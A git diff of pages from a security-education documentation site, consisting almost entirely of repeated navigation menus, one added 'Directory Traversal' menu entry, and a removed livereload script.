        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -195,22 +195,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext-Only Attack (COA)/Perfect Secrecy.html b/docs/Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext-Only Attack (COA)/Perfect Secrecy.html index a0a4711b..7e812c81 100644 --- a/docs/Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext-Only Attack (COA)/Perfect Secrecy.html +++ b/docs/Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext-Only Attack (COA)/Perfect Secrecy.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -279,22 +279,6 @@

L - - diff --git a/docs/Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext-Only Attack (COA)/Semantic Security.html b/docs/Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext-Only Attack (COA)/Semantic Security.html index 3b316059..314c3c63 100644 --- a/docs/Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext-Only Attack (COA)/Semantic Security.html +++ b/docs/Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext-Only Attack (COA)/Semantic Security.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
